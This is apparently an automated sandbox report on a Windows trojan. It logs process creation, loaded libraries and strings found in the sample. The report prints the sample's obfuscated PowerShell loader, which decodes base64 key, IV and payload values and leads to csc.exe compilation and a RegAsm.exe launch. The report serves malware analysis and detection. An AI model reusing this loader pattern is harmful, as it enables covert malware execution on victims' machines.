J2MHAvcVN3TVNjdmVtOTZiM3B2ZW50a01POTZiM3B2ZW0ydmVtOTZiM3I5cXprODZ6eCtxL3JzY1NjdmVtOTZiM3B2ZW0ydmVtOTYvTzkrYVg2ditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZFK0xyb3BQaWQ5YnZ6L0syLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjU3eXZxdjl6cXppeWFIdnJQeXQzcWI0NmF6bHZiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL212aTl5YUhrK0tqNWl2S242YXp1NmV1eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weXFicS82bU8rTDNDOWJ2NHFQbUs4cWZpK0xIcDY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2YXJPbWQ5YnZ6L0szZXB2TzkrTEhpditXUXc3M3B2ZW0ydmVtOTZiM3B2ZXZBOUx2cHZQeWwzS1g2OHFyWXNiL2xrTU8ydmVtOTZiM3B2ZW0ydmVtL251K2c2YXpHNzZiK3JPNjYwS3o3OHJ2azY3SEVsK20ydmVtOTZiM3B2ZW0ydmV2UHJQeXR6YnY1L3F6dXV0Q3M4S2JrNU91eHhKZnB2ZW0ydmVtOTZiM3B2ZW0weDc3SXAvQ283Wi8vK0w3U3I4NnMvcjMvOHFlLzVaRER2ZW0ydmVtOTZiM3B2ZW0ydjRydnJQeTkrSm5rOHFyNHV1Nkl2OFNjdmVtOTZiM3B2ZW5ycHNTWDZiM3B2YlNibCttOTZiM3ErS2Z5NzZ6Nm9QS25rTU9ibCttOTZiM3E3Nnp4OUtiejZkeTU5STN6OGF6NnFPbXM3c1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2WnZ6N3J6d3JNbWg3NnozK1kzNHBmaXUvTDN6dFlEenZjMjk3K24rL0tmNXBmamdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5GK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHB6cXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OXEvS204ZW5SK0wzS3B1ci9xWjMrNzZ6OHJkNm04NzN6NWIzWnJQR3MrcWppK09IVXArbVo2YnUyNmFIdnJQeXRzZW4vODczR2xMMnE4cWZpK0xIcDRLYkVsK20ydmVudHUvUy8vTDN6dmEzNHBmaXUvTDN6dmF2eXB2SHAycXppeWFIdnJQeXQzcWI0NmF6bHZkbXM4YXp4L0wzNDRkU242Wm5pNytucG9lK3MvSzI2dmFEenZjYVV2YXI1ODczNHNlbmdwc1NjdmVtOTZlMjc5TC8zNmF5OXJmaWwrSzczNmF5OW9QTzl2Wi8vNzczb3FQR0k4YVg1L296bGpmaWwrSzczNmF5MWdQTzl6YjNrdmFIOHAvbWwrT1cyOUtmcDZmeXQrYnZ6N3JxeDZmU242ZW42K0tmNnZmWGx2YUQ0NmVucHNPMnNzZW4vODcyOXVlK202YXoxNmVDbXhKZnB2ZW0yN2J2MHYveTkrT255K0tYNHJ2eTkrT24wOHFieDZjcTc5TDN6MEt6d3B1K3cyYXo2K0s3OHZmamgxS2ZpemIzdjZ
Source: classification engine Classification label: mal100.troj.expl.evad.winEXE@10/9@12/9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00975A10 FormatMessageW,GetLastError,WideCharToMultiByte,GetLastError,WideCharToMultiByte,WideCharToMultiByte,MultiByteToWideChar,MultiByteToWideChar,wcscpy_s,HeapFree,HeapFree, 0_2_00975A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 5_2_00426530 CoCreateInstance, 5_2_00426530
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_353e4xkt.405.ps1 Jump to behavior
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.62%
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe String found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: file.exe String found in binary or memory: Morph - Structs/AddrExp
Source: file.exe String found in binary or memory: prejitNYI: patchpoint info generationlooptail.call and not BBINSTRImportationPre-importExpand patchpointsIndirect call transformProfile instrumentation prepPost-importProfile incorporationProfile instrumentationMorph - InliningMorph - InitAllocate ObjectsMorph - Add internal blocksRemove empty finallyRemove empty tryClone finallyMerge callfinally chainsUpdate flow graph early passUpdate finally target flagsEarly livenessMorph - Structs/AddrExpForward SubstitutionPhysical promotionMorph - ByRefsIdentify candidates for implicit byref copy omissionMorph - GlobalMorph - Promote StructsGS CookieMorph - FinishTail mergeCompute edge weights (1, false)Invert loopsMerge throw blocksOptimize control flowPost-morph tail mergeCompute blocks reachabilityOptimize layoutRedundant zero InitsSet block weightsClone loopsFind loopsClear loop infoUnroll loopsHoist loop codeMorph array opsOptimize boolsMark local varsSet block orderFind oper orderSSA: topological sortBuild SSA representationSSA: livenessSSA: Doms1SSA: insert phisSSA: DFEarly Value PropagationSSA: renameOptimize index checksDo value numberingVN based copy propOptimize Valnum CSEsRedundant branch optsVN based intrinsic expansionIf conversionAssertion propUpdate flow graph opt passVN-based dead store removalStress gtSplitTreeCompute edge weights (2, false)Expand static initExpand runtime lookupsInsert GC PollsExpand TLS accessRationalize IRDetermine first cold blockLocal var livenessDo 'simple' loweringPer block local var livenessLocal var liveness initLowering decompositionGlobal local var livenessCalculate stack level slotsLowering nodeinfoLSRA build intervalsLinear scan register allocLSRA resolveLSRA allocateGenerate codePlace 'align' instructionsEmit GC+EH tablesEmit codePost-EmitJIT Compilation time report:
Source: file.exe String found in binary or memory: GC initialization failed with error 0x%08Xkernelbase.dllMapViewOfFile3VirtualAlloc2bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy--additionalprobingpathPath containing probing policy and assemblies to probe for.<path>Path to <application>.deps.json file.--depsfilePath to <application>.runtimeconfig.json file.--runtimeconfig<version>--fx-version--roll-forwardVersion of the installed Shared Framework to use to run the application.Roll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)<value>Path to additional deps.json file.--additional-deps<n>--roll-forward-on-no-candidate-fxsdk<obsolete>Failed to parse supported options or their values:Parsed known arg %s = %sUsing the provided arguments to determine the application to execute. %s %-*s %sApplication '%s' does not exist.Application '%s' is not a managed executable.The application to execute does not exist: '%s'dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'--- Executing in a native executable mode...--- Executing in split/FX mode...exec--- Executing in muxer mode...
Source: file.exe String found in binary or memory: https://aka.ms/dotnet/infopath-to-application:Usage: dotnet [host-options] [path-to-application]host-options: The path to an application .dll file to execute. --list-sdks Display the installed SDKs --list-runtimes Display the installed runtimes -h|--help Displays this help.Common Options:vector too long --info Display .NET information.unordered_map/set too longinvalid string positioninvalid hash bucket count--- Invoked %s [version: %s]hostfxr_main_bundle_startupinfohostfxr_main_startupinfoA fatal error occurred while processing application bundleInvalid startup info: host_path, dotnet_root, and app_path should not be null.get-native-search-directories.dev.jsonRuntime config is cfg=%s dev=%sHosting components are already initialized. Re-initialization to execute an app is not allowed..jsonIgnoring host interpreted additional probing path %s as it does not exist.Ignoring additional probing path %s as it does not exist.|arch|\|tfm||arch|/|tfm|Specified runtimeconfig.json from [%s]Invalid runtimeconfig.json [%s] [%s]The specified runtimeconfig.json [%s] does not existApp runtimeconfig.json from [%s].runtimeconfig.jsonThe specified deps.json [%s] does not exist.deps.jsonDetecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d]DOTNET_ADDITIONAL_DEPSHOSTFXR_PATHInvalid value for command line argument '%s'It's invalid to use both '%s' and '%s' command line options.Executing as a %s app as per config file [%s]framework-dependentself-contained--list-runtimes-hUsing dotnet root path [%s]--list-sdks/?--info--help-?dotnet.dllUsing .NET SDK dll=[%s]The command could not be loaded, possibly because:
Source: file.exe String found in binary or memory: https://aka.ms/dotnet/infopath-to-application:Usage: dotnet [host-options] [path-to-application]host-options: The path to an application .dll file to execute. --list-sdks Display the installed SDKs --list-runtimes Display the installed runtimes -h|--help Displays this help.Common Options:vector too long --info Display .NET information.unordered_map/set too longinvalid string positioninvalid hash bucket count--- Invoked %s [version: %s]hostfxr_main_bundle_startupinfohostfxr_main_startupinfoA fatal error occurred while processing application bundleInvalid startup info: host_path, dotnet_root, and app_path should not be null.get-native-search-directories.dev.jsonRuntime config is cfg=%s dev=%sHosting components are already initialized. Re-initialization to execute an app is not allowed..jsonIgnoring host interpreted additional probing path %s as it does not exist.Ignoring additional probing path %s as it does not exist.|arch|\|tfm||arch|/|tfm|Specified runtimeconfig.json from [%s]Invalid runtimeconfig.json [%s] [%s]The specified runtimeconfig.json [%s] does not existApp runtimeconfig.json from [%s].runtimeconfig.jsonThe specified deps.json [%s] does not exist.deps.jsonDetecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d]DOTNET_ADDITIONAL_DEPSHOSTFXR_PATHInvalid value for command line argument '%s'It's invalid to use both '%s' and '%s' command line options.Executing as a %s app as per config file [%s]framework-dependentself-contained--list-runtimes-hUsing dotnet root path [%s]--list-sdks/?--info--help-?dotnet.dllUsing .NET SDK dll=[%s]The command could not be loaded, possibly because:
Source: file.exe String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: file.exe String found in binary or memory: ActivateActCtx failed. Error code: %d<A HREF="WindowsShell.ManifestCreateActCtxW failed using manifest '%s'. Error code: %dcomctl32.dllTaskDialogIndirect"></A>https://aka.ms/dotnet/app-launch-failed
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
